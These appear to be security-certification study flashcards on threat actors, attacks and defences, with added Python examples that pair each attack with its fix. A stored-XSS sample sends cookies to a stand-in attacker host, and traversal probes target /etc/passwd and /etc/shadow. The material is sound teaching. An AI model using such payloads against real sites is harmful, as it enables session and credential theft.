Chapter 2 Flashcards

1
Q

Threat Actor

A

An entity responsible for an event that has affected, or could affect, the security of another entity. Also called a malicious actor.

2
Q

Avalanche Effect

A

In a hashing algorithm, changing a single bit of the input changes about half of the output bits, so the resulting hash is completely different and gives no hint about the original input.
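An added Python example (not part of the original flashcards) that measures the avalanche effect directly: it flips one input bit and counts how many of the 256 SHA-256 output bits change. The message is a constructed sample; a good hash should flip about 128 bits regardless of which input bit you touch.

```python
import hashlib


def sha256_bits(data: bytes) -> str:
    """SHA-256 digest of `data` as a 256-character string of '0'/'1'."""
    digest = hashlib.sha256(data).digest()
    return format(int.from_bytes(digest, "big"), "0256b")


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Copy of `data` with exactly one bit flipped (bit 0 is the LSB of the last byte)."""
    value = int.from_bytes(data, "big") ^ (1 << bit_index)
    return value.to_bytes(len(data), "big")


def hamming_distance(a: str, b: str) -> int:
    """Number of positions at which two equal-length bit strings differ."""
    return sum(x != y for x, y in zip(a, b))


def avalanche(data: bytes, bit_index: int = 0) -> int:
    """Flip one input bit and return how many of the 256 output bits changed.

    A good hash behaves like a random function, so roughly half (128) should flip.
    """
    return hamming_distance(sha256_bits(data), sha256_bits(flip_bit(data, bit_index)))


if __name__ == "__main__":
    message = b"transfer 100 USD to account 12345"  # constructed sample input
    for i in range(8):
        changed = avalanche(message, i)
        print(f"flip input bit {i:2d}: {changed:3d}/256 output bits changed")
```

Run it and the counts cluster around 128; compare that with a non-cryptographic checksum, where a one-bit change usually moves only a few output bits.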

3
Q

Advanced Persistent Threat (APT)

A

Highly sophisticated threat actors, usually nation-state backed, that can sustain constant attacks over a long period and have access to massive resources.

4
Q

Unskilled attackers

A

A threat actor who runs premade scripts or tools without any knowledge of what is happening under the hood. Also called "script kiddies".

5
Q

Hacktivist

A

A hacker with a cause, motivated by ideology, revenge, disruption, etc. Can be very sophisticated and motivated but often has limited funding.

6
Q

Insider Threat

A

Someone inside the organization who can turn its own resources against it for revenge, financial gain, etc. Already has knowledge of where to attack and of existing security weaknesses.

7
Q

Organized Crime

A

Usually motivated by money and almost always an external entity. Very sophisticated, with lots of capital.

8
Q

Shadow IT

A

Members of the organization who use workarounds to avoid the controls put in place by the IT department. They often set up their own systems or networks to get around limitations like change control and other security practices. Can be a huge risk, because those systems are unmanaged and unpatched.

9
Q

Threat Vector

A

The method an attacker uses to gain access to the system. Also called “attack vector”

10
Q

Phishing

A

Enticing someone to click a link that tricks them into exposing sensitive data or installing malware. Social engineering that makes the message look like a legitimate communication or service.

11
Q

Scalable Vector Graphic (SVG)

A

An XML-based image file format that can contain embedded code. Can be used to perform HTML injection or to deliver JavaScript attack code when a browser renders it.

12
Q

File Based Vectors

A

More than just executables: malicious code can hide in many file types, such as Adobe PDFs or Microsoft Office macros.

13
Q

Removable device vectors

A

USB drives and other removable media get around a network firewall entirely. They can be used to infect air-gapped systems.

14
Q

Air gapped Network

A

A network with no direct connection to the internet or other networks

15
Q

802.1x

A

IEEE 802.1X is port-based network access control: the switch port or wireless association grants no access to data or network resources until proper credentials are provided (typically via EAP against a RADIUS server).

16
Q

Supply Chain Vector

A

Tampering with the underlying infrastructure or manufacturing process to introduce vulnerabilities into products before they reach the customer.

17
Q

Managed Service Providers (MSP)

A

Monitors systems and informs you when things need to be changed. If an attacker can infiltrate an MSP, they gain access to many organizations' systems at once.

18
Q

Typosquatting

A

URLs that are similar to the legitimate site but have slight changes.

19
Q

Pretexting

A

Using stories and lies to manipulate you into believing a fabricated scenario. The attacker plays a character in the story they create.

20
Q

Smishing

A

SMS phishing

21
Q

Impersonation

A

The attacker pretends to be someone they aren't. Could introduce themselves as someone higher in rank to pressure the victim.

22
Q

Identity Fraud

A

The attacker uses your information to impersonate you, giving them access to your resources and privileges.

23
Q

Watering hole Attack

A

Infecting a third-party site that employees of the target organization frequent, and using it to gain access. Infect all visitors, then pursue the real target.

24
Q

Defense in Depth

A

Layering defense measures that can catch threats that others may have missed

25
Q

Buffer Overflow

A

Writing more than is expected into a particular area of memory, causing other memory to be overwritten. Developers need to perform bounds checking to prevent this. Difficult exploit, and it needs to be repeatable to be useful.

26
Q

Race Condition

A

When two events happen at nearly the same time within an application and the outcome depends on which one finishes first. This can be a big issue if it is not planned for.

27
Q

Time of Check to Time of Use (TOCTOU)

A

Applications may check a condition before performing an action. Something may change between the check and the action (for example, a file the check approved is swapped for another), with negative consequences.
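An added Python example for the Race Condition and TOCTOU cards (not part of the original flashcards). A file server checks that a path is a plain file and then opens it by name; a hook stands in for the attacker winning the race and swapping the file for a symlink to a secret. The hardened version opens first and checks the open descriptor, so there is no second name lookup. It assumes a POSIX filesystem (os.O_NOFOLLOW and symlinks); the file names and contents are constructed.

```python
import os
import stat
import tempfile


def serve_vulnerable(path, between_check_and_use=lambda: None):
    """Check-then-use on a *name*: the name may point elsewhere by the time it is opened."""
    # Time of check: refuse symlinks and anything that is not a regular file.
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("refused at time of check")
    between_check_and_use()  # the race window; an injected hook stands in for a real race
    # Time of use: the path is resolved a second time and may now be a symlink to a secret.
    with open(path, "rb") as f:
        return f.read()


def serve_safe(path):
    """Open first, then check the open file descriptor: no second name lookup exists."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # raises OSError (ELOOP) on a symlink
    try:
        st = os.fstat(fd)  # properties of the object we actually opened
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def demo():
    """Return (bytes the vulnerable server leaked, safe server's normal read, safe server refused?)."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")  # constructed files
        secret = os.path.join(d, "secret.txt")
        with open(public, "w") as f:
            f.write("hello")
        with open(secret, "w") as f:
            f.write("TOP SECRET")

        normal = serve_safe(public)  # before the attack: b"hello"

        def attacker_swaps_file_for_symlink():
            os.remove(public)
            os.symlink(secret, public)

        leaked = serve_vulnerable(public, attacker_swaps_file_for_symlink)

        try:
            serve_safe(public)  # the symlink is now in place; O_NOFOLLOW rejects it
            refused = False
        except OSError:
            refused = True
        return leaked, normal, refused


if __name__ == "__main__":
    leaked, normal, refused = demo()
    print("vulnerable server returned:", leaked)
    print("safe server before attack:", normal, "| refused symlink after attack:", refused)
```

The fix is not "check faster"; it is making the check and the use apply to the same object (the descriptor) so nothing can be substituted in between.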

28
Q

Malicious Updates

A

Attackers perform a supply chain attack to add malicious code to official updates, which trusting customers then install.

29
Q

Operating System

A

The foundational computing platform of a device. Is often tens of millions of lines of code, so there is a large surface area for attack.

30
Q

Patch Tuesday

A

On the second Tuesday of every month Microsoft releases its scheduled Windows updates and security patches.

31
Q

Code Injection

A

Adding your own code into an application's input areas so that the application executes it. Enabled by bad input handling in the application.

32
Q

Structured Query Language (SQL)

A

The most common relational database language

33
Q

SQL Injection

A

Adding your own SQL to the input of an existing application so that the database runs it. Applications should never pass user input directly into a query; use parameterized queries so users cannot make their own requests.

34
Q

Cross Site Scripting (XSS)

A

A type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

35
Q

Persistent XSS Attack

A

Attacker posts a message to a social network that includes the malicious code. Everyone who views the page gets the payload. Could add code that forces viewers to post the message to their own page, spreading it further.
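An added Python example (not from the original flashcards) of the stored XSS the card describes: a comment list is rendered into a page with and without output encoding. The comments, including the attacker's payload and its attacker.example URL, are constructed.

```python
import html

# Constructed comments as stored by a social site; the second one is the attacker's post.
STORED_COMMENTS = [
    "Nice photo!",
    '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>',
]


def render_vulnerable(comments):
    """Interpolates stored text straight into the page.

    Every visitor's browser parses and runs the attacker's script; the payload could
    in turn post itself to the viewer's own page, which is how such an attack self-spreads.
    """
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_safe(comments):
    """HTML-escapes at output time so the payload is displayed as text, never parsed as markup."""
    return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments) + "</ul>"


def contains_script(page):
    """Crude check used here only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(STORED_COMMENTS))
    print("safe      :", render_safe(STORED_COMMENTS))
```

Encode at the point of output, in the context you are writing into (here, element body); data that is later placed inside an attribute, a URL or inline JavaScript needs the encoding appropriate to that context.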

36
Q

Hardware Vulnerabilities

A

Devices that are connected to a network are potential security risks.

37
Q

IOT

A

Internet of Things: everyday networked devices (cameras, thermostats, appliances) that often ship with weak security.

38
Q

Firmware

A

The operating system of a hardware device. We may not have direct access to this software; sometimes we have no idea what this operating system even is. Vendors are the only ones who can fix it, and many don't care about security vulnerabilities.

39
Q

End of Life Notice (EOL)

A

A notice that a manufacturer is no longer selling the product. Many times the product will stop receiving updates and patches.

40
Q

End of Service Life (EOSL)

A

Manufacturer is no longer selling or providing support for the product. May still have a premium-cost support option. EOSL is a significant concern, as security patches are an important part of normal operation.

41
Q

Legacy Platforms

A

Older devices that may be running end-of-life software. The security risks and maintenance costs must be weighed against the returns. May require additional protections, like extra firewall rules or additional IPS signatures for older operating systems.

42
Q

Virtual Machine (VM)

A

an isolated computing environment created by abstracting resources from a physical machine.

43
Q

VM Escape

A

Breaking out of the VM and interacting with the host operating system or hardware.

44
Q

Hypervisor

A

Manages the relationship between the physical and virtual resources of a virtual machine and its host.

45
Q

Common Vulnerability Scoring System (CVSS)

A

A way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity

46
Q

Directory Traversal

A

A web server vulnerability that lets a user move outside the intended directory, for example with ../ sequences in a URL, into other folders or subdirectories on the server.
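An added Python example (not from the original flashcards) of how a naive path join lets ../ and URL-encoded %2e%2e walk out of the document root, and how resolving the path and checking it against the root stops that. The web root /var/www/html is an assumption for illustration; it does not need to exist, and the check assumes a POSIX path layout.

```python
import os
from urllib.parse import unquote

# Assumed document root for the example; it need not exist for path resolution to work.
WEB_ROOT = os.path.realpath("/var/www/html")


def resolve_vulnerable(requested):
    """Joins the URL path onto the root and only normalizes.

    '..' segments walk out of the root, and an absolute path makes os.path.join
    discard the root entirely.
    """
    return os.path.normpath(os.path.join(WEB_ROOT, unquote(requested)))


def resolve_safe(requested):
    """Decode, fully resolve (collapsing '..' and symlinks), then require the result to stay under the root."""
    candidate = os.path.realpath(os.path.join(WEB_ROOT, unquote(requested)))
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return candidate


def is_allowed(requested):
    """True if the safe resolver would serve this request."""
    try:
        resolve_safe(requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    probes = [
        "images/logo.png",
        "../../../etc/passwd",
        "%2e%2e/%2e%2e/%2e%2e/etc/shadow",
        "/etc/passwd",
        "images/../../../etc/passwd",
    ]
    for req in probes:
        print(f"{req!r:38} naive -> {resolve_vulnerable(req):28} safe allows: {is_allowed(req)}")
```

Blocklisting the string ".." is not enough (encoding and symlinks both get around it); deciding on the resolved absolute path is what holds.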

47
Q

Remote Code Execution (RCE)

A

The ability for attackers to run code on a machine remotely over the network, without local or physical access.

48
Q

Out of Bounds Write

A

Write to unauthorized memory areas resulting in data corruption, crashing, or code execution.

49
Q

Supply Chain

A

The process of getting a product from the raw materials all the way to getting the finished product to a consumer. Attackers can infect the product or service at any step along the way

50
Q

Target Corp 2013 Breach

A

40 million credit cards stolen. An HVAC firm in Pennsylvania was infected: malware was delivered in a phishing email and VPN credentials were stolen. Attackers then had access to the HVAC systems within the Target Corp network. The HVAC and cash register systems were on the same network with no access restrictions between them. Attackers put malware on every cash register and used it to collect credit cards.

51
Q

Misconfiguration Vulnerabilities

A

With all of the different systems that an organization needs to perform their day to day business it is increasingly easier to misconfigure one of them. Cloud computing increases this as there are many permissions and settings to configure.

52
Q

Insecure Protocols

A

Some protocols aren't encrypted, which means that data traverses the network in the clear: Telnet, FTP, and SMTP or IMAP used without TLS.

53
Q

Mirai Botnet

A

Takes advantage of default configurations. Takes over IoT devices by trying a list of over 60 default usernames and passwords: cameras, routers, doorbells, garage door openers, etc. Mirai was released as open source software, so variants keep appearing.

54
Q

Port Security

A

Each time you enable an inbound service on a server you must open a port. That port is what someone on the outside uses to reach that specific application, which gives them access to a section of your server. Port numbers are often managed by a firewall, which will allow or deny traffic based on port number or application.

55
Q

Mobile Device Vulnerabilities

A

Often challenging to secure. Need additional security policies and systems. Relatively small and easy to hide. Almost always in motion. Packed with sensitive data, both personal and organizational. Constantly connected to the internet.

56
Q

Jailbreaking/Rooting

A

Removing the manufacturer's restrictions on a mobile device to gain root or administrator access, often by installing a custom OS image. This circumvents the platform's security features and management controls.

57
Q

Mobile Device Manager

A

(MDM) Centralized management of mobile devices: enforces policies such as encryption, passcodes, app allow lists, and remote wipe.

58
Q

Sideloading

A

Installing an app without using an official app store.

59
Q

Zero Day Vulnerability

A

A vulnerability that is unknown to the vendor for which a patch or fix is not available.

60
Q

Zero Day Attack

A

Exploiting a zero-day vulnerability, leaving the vendor and the security community scrambling to develop and deploy a patch.

61
Q

Common Vulnerabilities and Exposures (CVE)

A

cve.mitre.org Provides a reference method for publicly known information-security vulnerabilities and exposures.

62
Q

Malware

A

Malicious software that does bad things to your system: gathering information, showing you advertising, encrypting your data and holding it for ransom.

63
Q

Ransomware

A

Infects your machine, encrypts your data, and then demands payment to decrypt it. A malicious use of cryptography. A good reason to back up your data often, and to store backups offline so that ransomware cannot encrypt them too.

64
Q

Virus

A

Malware that can replicate itself, but needs a user to run the infected program.

65
Q

Worm

A

Malware that self-replicates between systems without any user input. Uses the network as a transmission medium, so it spreads quickly.

66
Q

Spyware

A

Malware that watches everything on your computer.

67
Q

Bloatware

A

Unnecessary software that comes preinstalled on your device. Often the device manufacturers are paid to include them. Uses up storage, slows your system, exposes your system to potential exploits.

68
Q

Keyloggers

A

Captures your keystrokes, saves them to a file, and sends it back to the attacker. This circumvents encryption, since the data is captured before it is encrypted.

69
Q

Dark Comet

A

A remote access trojan (RAT) with keylogging capability.

70
Q

Logic Bomb

A

Waits for an event to occur and then activates to cause harm to the system. Reboots, erases data, makes changes.

71
Q

Rootkit

A

Hides itself in the kernel of the operating system. Modifies core system files and can be invisible to the operating system and to anti-malware tools. UEFI Secure Boot verifies that the bootloader and operating system signatures are unchanged before the system boots.

72
Q

Physical attacks

A

Gaining physical access to a device, which circumvents many network security protocols and protections

73
Q

Radio Frequency Identification (RFID)

A

Commonly used for access badges and key fobs. These can be cloned in seconds using devices available on Amazon for under $50. Badges can be duplicated at a bar or on a train on the way to work. Another reason to use MFA.

74
Q

Environmental Attacks

A

Attacks involving everything that supports the technology and network: turning off the power to a datacenter, damaging HVAC systems or fire suppression.

75
Q

Denial of Service (DoS)

A

Forcing a service to fail. Often done by overloading the system with too many requests or too much data. May be used as a smokescreen for some other exploit.

76
Q

Unintentional DoS

A

Misconfiguring your own system in a way that creates a loop or bandwidth issue, causing your system to stop working. Physical events like flooding from a broken water line can also cause this.

77
Q

Distributed Denial of Service (DDoS)

A

Launching an army of computers to bring down a service. This is why attackers create botnets: using malware, attackers take control of thousands or millions of computers and aim their traffic at one service.

78
Q

Asymmetric Threat

A

The attacker may have far fewer resources but can still easily bring down large organizations.

79
Q

DDoS Reflection and Amplification

A

Reflecting traffic off another device or service, with the victim's address spoofed as the source. Turns a small attack into a big one by using internet services against the victim. Uses protocols with little or no authentication or checks: NTP, DNS, ICMP. When you request information from an NTP or DNS server you generally receive back more data than was in the request, and that larger reply is delivered to the victim.

80
Q

DNS poisoning

A

Causing a user to visit an IP address they did not originally intend. Can be done by modifying a DNS server (difficult) or by modifying the client's hosts file (easier); the hosts file takes precedence over DNS queries. It can also be done by an on-path attacker spoofing DNS responses.

81
Q

Domain Hijacking

A

Get access to the domain registration and you have control where the traffic flows.

82
Q

Wireless Deauthentication

A

A wireless DoS attack that removes the victim from a connected network. 802.11 wireless includes management frames, which attackers can spoof to disconnect the victim because those frames were originally unauthenticated and unencrypted. IEEE addressed this in 802.11w (protected management frames), which protects the important management frames; it is required as part of 802.11ac.

83
Q

Radio Frequency Jamming (RF Jamming)

A

Transmitting interfering wireless signals to decrease the signal-to-noise ratio at the receiving device, so the receiver cannot get a clear signal. Sometimes it is not intentional: fluorescent lights, microwaves.

84
Q

Fox Hunting

A

Finding an RF jammer using directional antennas and an attenuator, moving toward the strongest signal.

85
Q

On Path Attack

A

The attacker sits between two devices to watch their traffic. Formerly called man-in-the-middle. Captures and passes along, or redirects, the data.

86
Q

ARP Poisoning

A

On-path attack on a local IP subnet. The attacker must be on the same subnet. ARP has no authentication or encryption, so spoofed replies are accepted.

87
Q

On Path Browser Attack

A

Attacker uses malware or a trojan to gain access to the victim's computer or browser. Allows the attacker to access the data before it is encrypted.

88
Q

Replay Attack

A

Network attack where an attacker intercepts and maliciously retransmits data that was already exchanged. The attacker needs access to the raw network data using a network tap, ARP poisoning, or malware.

89
Q

Pass the Hash

A

Attacker intercepts an authentication exchange (username and hashed password) and then sends their own authentication request using the captured hash, without ever knowing the password. Mitigated by encrypting the session, using per-session challenge/nonce values so a captured response cannot be reused, and salting stored hashes.
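An added Python example for the Replay Attack and Pass the Hash cards (not from the original flashcards). It shows both sides of a nonce-based challenge-response login and why a captured (nonce, response) pair is useless afterwards: the server consumes each nonce once, and a fresh nonce yields a different expected response. The user name and shared secret are constructed. Caveat: this stops replay of a captured exchange; if the attacker steals the stored secret itself (the hash, in the pass-the-hash case), a nonce no longer helps, which is why protecting the credential store matters as well.

```python
import hashlib
import hmac
import os


class AuthServer:
    """Server side of a nonce-based challenge-response login (constructed example)."""

    def __init__(self, users):
        self.users = users        # user -> shared secret stored server-side
        self.outstanding = {}     # user -> nonce issued and not yet consumed

    def challenge(self, user):
        nonce = os.urandom(16)    # fresh, unpredictable, single use
        self.outstanding[user] = nonce
        return nonce

    def verify(self, user, nonce, response):
        issued = self.outstanding.pop(user, None)  # consume: a nonce is valid exactly once
        if issued is None or not hmac.compare_digest(issued, nonce):
            return False
        expected = hmac.new(self.users[user], nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)  # constant-time comparison


def client_response(secret, nonce):
    """The client proves knowledge of the secret without sending it: HMAC(secret, nonce)."""
    return hmac.new(secret, nonce, hashlib.sha256).digest()


def demo():
    """Return (legitimate login ok, replay with captured nonce ok, replay against new nonce ok)."""
    secret = b"alice-shared-secret"  # constructed
    server = AuthServer({"alice": secret})

    # 1. Legitimate login; an on-path attacker records (n1, r1) off the wire.
    n1 = server.challenge("alice")
    r1 = client_response(secret, n1)
    legit_ok = server.verify("alice", n1, r1)

    # 2. Attacker replays the captured pair: the nonce was already consumed, so it fails.
    replay_same_nonce = server.verify("alice", n1, r1)

    # 3. Attacker requests a new challenge and replays the old response: wrong nonce, fails.
    n2 = server.challenge("alice")
    replay_new_nonce = server.verify("alice", n2, r1)

    return legit_ok, replay_same_nonce, replay_new_nonce


if __name__ == "__main__":
    print("legit, replay(same nonce), replay(new nonce) =", demo())
```
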

90
Q

Cookies

A

Files that store information about the sites that you visit. Used for tracking, personalization, session management. Can be used to store session IDs which could be used by an attacker to gain access to a server without providing any log in credentials.

91
Q

Preventing Session Hijacking

A

Encrypt end-to-end: HTTPS encrypts your data, and a VPN can add encryption on an untrusted network.

92
Q

WannaCry Ransomware

A

Executable exploited a vulnerability in Windows SMBv1 (the EternalBlue exploit). Allowed arbitrary code execution and access to the OS, and spread between machines as a worm.

93
Q

British Airways cross site scripting

A

22 lines of malicious JavaScript code were added to checkout pages. Information was stolen from 380,000 victims.

94
Q

Estonian Central Health Database

A

SQL injection that breached all healthcare information for an entire country

95
Q

Horizontal Privilege Escalation

A

Allows user A to access User B resources.

96
Q

Address space Layout Randomization

A

Randomizes where data and code are placed in memory each time an application is run. Makes buffer overflow exploits less repeatable.

97
Q

Downgrade Attack

A

Forces a victim to use a less secure encryption method.

98
Q

SSL Stripping

A

A combination of an on-path attack with a downgrade attack: the attacker gets in the middle of a conversation and serves the victim unencrypted web page content, tricking the victim into using HTTP instead of HTTPS. The victim must make the initial request over HTTP. The attacker captures that request and passes it along to the server, establishing the encrypted session with the server itself, so it can read all the data even after the server moves to HTTPS. HSTS (HTTP Strict Transport Security) helps prevent this.

99
Q

Password Attacks

A

Passwords should never be stored in plaintext; store a salted hash. SHA-256 is used in many applications, though a slow, purpose-built password hash such as PBKDF2 or bcrypt is better.

100
Q

Spraying Attack

A

Attack an account with the top few common passwords. If it doesn’t work, they simply move on to the next account

101
Q

Brute Force

A

Trying every possible password combination until the hash is matched. Most accounts will lock out after a number of attempts, so attackers obtain the list of users and hashes and then run the brute force attack offline.
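An added Python example for the Password Attacks, Spraying Attack and Brute Force cards (not from the original flashcards). It stores passwords as salted PBKDF2 hashes, then runs the three attacks from the cards against a constructed login service: an online brute force that trips the per-account lockout, a spray that stays under it by trying one password per account at a time, and an offline dictionary attack against a stolen salt and hash, where no lockout applies. The accounts, passwords and word lists are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000        # PBKDF2 work factor; raise it in production
LOCKOUT_THRESHOLD = 5       # failed attempts before an account locks


def hash_password(password, salt=None):
    """Salt + slow salted hash. Two users with the same password get different digests."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    guess = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(guess, digest)   # constant-time comparison


class LoginService:
    """Online target with per-account lockout (a constructed stand-in for a real IdP)."""

    def __init__(self, users):
        self.db = {u: hash_password(p) for u, p in users.items()}
        self.failures = {u: 0 for u in users}

    def locked(self, user):
        return self.failures[user] >= LOCKOUT_THRESHOLD

    def login(self, user, password):
        if user not in self.db or self.locked(user):
            return False
        salt, digest = self.db[user]
        if verify_password(password, salt, digest):
            self.failures[user] = 0
            return True
        self.failures[user] += 1
        return False


def online_brute_force(service, user, wordlist):
    """Many guesses against one account: the lockout stops it after a few tries."""
    for pw in wordlist:
        if service.login(user, pw):
            return pw
        if service.locked(user):
            return None
    return None


def password_spray(service, users, common_passwords):
    """Few guesses against many accounts: each account sees one try per password, so none locks."""
    hits = {}
    for pw in common_passwords:
        for user in users:
            if user not in hits and service.login(user, pw):
                hits[user] = pw
    return hits


def offline_dictionary_attack(salt, digest, wordlist):
    """With a stolen salt+hash no lockout applies; the cost is one PBKDF2 run per guess per user."""
    for pw in wordlist:
        if verify_password(pw, salt, digest):
            return pw
    return None


if __name__ == "__main__":
    users = ["alice", "bob", "carol"]
    svc = LoginService({"alice": "Tr0ub4dor&3-xkcd", "bob": "Password1", "carol": "Summer2024!"})
    print("spray hits   :", password_spray(svc, users, ["Password1", "Welcome1", "Summer2024!"]))
    print("anyone locked:", [u for u in users if svc.locked(u)])
    words = ["123456", "qwerty", "letmein", "dragon", "monkey", "hunter2", "Tr0ub4dor&3-xkcd"]
    print("brute alice  :", online_brute_force(svc, "alice", words), "| locked:", svc.locked("alice"))
    salt, digest = svc.db["alice"]                     # what an attacker has after a database leak
    print("offline crack:", offline_dictionary_attack(salt, digest, words))
```

The salt does not stop the offline attack on a weak password; it forces the attacker to do the work per user instead of once for everyone, and the slow hash makes each guess expensive. Lockout only helps online, which is why stolen hash dumps are attacked offline.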

102
Q

Indicators of Compromise (IOC)

A

An event that indicates an intrusion: unusually high network activity, changes to file hash values, irregular international traffic, changes to DNS data, uncommon login patterns, spikes of read requests to certain files.

103
Q

Account Lockout

A

Credentials aren't working, or the login attempt limit has been exceeded, even though you did not make those attempts.

104
Q

Concurrent Session usage

A

There should not be multiple logins to one account from multiple locations or systems. If someone is logging in from very different locations in a short time frame, alarms should be firing.
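An added Python example (not from the original flashcards) of the detection this card calls for: it parses a few authentication log lines, computes the great-circle distance between a user's successive successful logins, and alerts when the implied travel speed is faster than an airliner. The log lines, IP addresses and coordinates are constructed; the 900 km/h threshold is an assumption you would tune.

```python
import math
from datetime import datetime

# Constructed sample authentication log (not from a real system). geo=lat,lon is IP geolocation.
SAMPLE_LOG = """\
2024-05-01T08:00:00Z user=alice result=success src=198.51.100.7 geo=40.7128,-74.0060
2024-05-01T08:20:00Z user=alice result=failure src=203.0.113.9 geo=51.5074,-0.1278
2024-05-01T08:45:00Z user=alice result=success src=203.0.113.9 geo=51.5074,-0.1278
2024-05-01T09:00:00Z user=bob result=success src=192.0.2.10 geo=37.7749,-122.4194
2024-05-01T17:30:00Z user=bob result=success src=192.0.2.44 geo=34.0522,-118.2437
"""

MAX_PLAUSIBLE_KMH = 900.0  # about airliner cruise speed; faster implies two parties on one account


def parse_line(line):
    """Parse one 'timestamp key=value ...' log line into a dict."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    lat, lon = (float(x) for x in kv["geo"].split(","))
    return {
        "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "user": kv["user"],
        "result": kv["result"],
        "src": kv["src"],
        "lat": lat,
        "lon": lon,
    }


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on Earth, in kilometres."""
    earth_radius_km = 6371.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * earth_radius_km * math.asin(math.sqrt(a))


def find_impossible_travel(log_text, max_kmh=MAX_PLAUSIBLE_KMH):
    """Flag successive successful logins by one user whose implied travel speed exceeds max_kmh."""
    events = [parse_line(line) for line in log_text.splitlines() if line.strip()]
    events.sort(key=lambda e: (e["user"], e["time"]))
    last_login = {}
    alerts = []
    for ev in events:
        if ev["result"] != "success":
            continue  # failures feed lockout alerts, not travel-speed alerts
        prev = last_login.get(ev["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
            hours = (ev["time"] - prev["time"]).total_seconds() / 3600
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                alerts.append({"user": ev["user"], "from": prev["src"], "to": ev["src"],
                               "km": round(km), "hours": round(hours, 2), "kmh": round(speed)})
        last_login[ev["user"]] = ev
    return alerts


if __name__ == "__main__":
    for alert in find_impossible_travel(SAMPLE_LOG):
        print("IMPOSSIBLE TRAVEL:", alert)
```

In the sample, alice logs in from New York and then London 45 minutes later (thousands of km/h), while bob's San Francisco to Los Angeles move over eight hours is ordinary. In production, expect VPN egress points and mobile carrier geolocation to produce false positives; allow-list known corporate exits before paging anyone.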

105
Q

Resource Consumption

A

Every attacker action will have an equal and opposite reaction: file transfers use bandwidth, firewall logs show the outgoing transfer, servers may have crashed because an attacker was probing for an exploit.

106
Q

Out of Cycle Logging

A

Log or log data that should not occur during that time frame

107
Q

Missing Log information

A

Attackers will try to cover their tracks by removing logs. Missing logs are suspicious, logs need to be secure and monitored. There should be alerts and notifications if logs are tampered with.

108
Q

Segmentation

A

Can help limit the scope of a security event. Can be done through physical, logical, or virtual means. Also done to improve performance and reliability. May be mandated or needed for compliance, such as PCI DSS (Payment Card Industry Data Security Standard).

109
Q

Access Control List (ACL)

A

Allows you to group categories of traffic and allow or deny those requests.

110
Q

Full Disk Encryption (FDE)

A

Encrypting everything on the drive. Can use tools like BitLocker (Windows) and FileVault (macOS).

111
Q

Monitoring

A

Aggregating information about your systems and devices. Could be built into devices or as standalone devices. Often integrated into servers, switches, routers, firewalls etc.

112
Q

Sensors

A

Devices or software that generate security data: IPS/IDS alerts, firewall and server logs, authentication logs.

113
Q

Collectors

A

A place where all of the logs are consolidated and can be viewed.

114
Q

Security Information and Event Manager (SIEM)

A

A type of collector. May include a correlation engine to compare diverse sensor data and raise alerts.

115
Q

Least privilege

A

Rights and permissions should be configured to the bare minimum a user or process needs to perform its job.

116
Q

Decommissioning

A

Should be a formal policy. Most often associated with storage devices. Can wipe the device for use in another system or destroy the physical device.

117
Q

Hardening

A

Making a device or system more secure

118
Q

Endpoint

A

The devices that the user is using to access the data.

119
Q

Endpoint Detection and Response (EDR)

A

Goes beyond signatures to detect a threat: behavior analysis, machine learning, process monitoring. EDR software can isolate the system, quarantine the threat, and roll back to a previous configuration. EDRs are API driven, so responses can run automatically without user or technician intervention.

120
Q

Host Based Firewall

A

A personal software based firewall that runs on every endpoint. A great place to identify and block unknown processes that may have been launched due to a security vulnerability. Runs on each device but can be managed by a central console.

121
Q

Intrusion Prevention System

A

A network security tool that monitors network traffic for potential threats and automatically blocks them.

122
Q

Host Based Intrusion Prevention System (HIPS)

A

Often built into the EDR or anti-malware agent. Watches all inbound traffic for known attacks. Secures OS and application configurations and validates incoming service requests. Identifies signatures, heuristics, behavioral changes, buffer overflows, registry updates, writing files to the Windows folder, and access to non-encrypted data.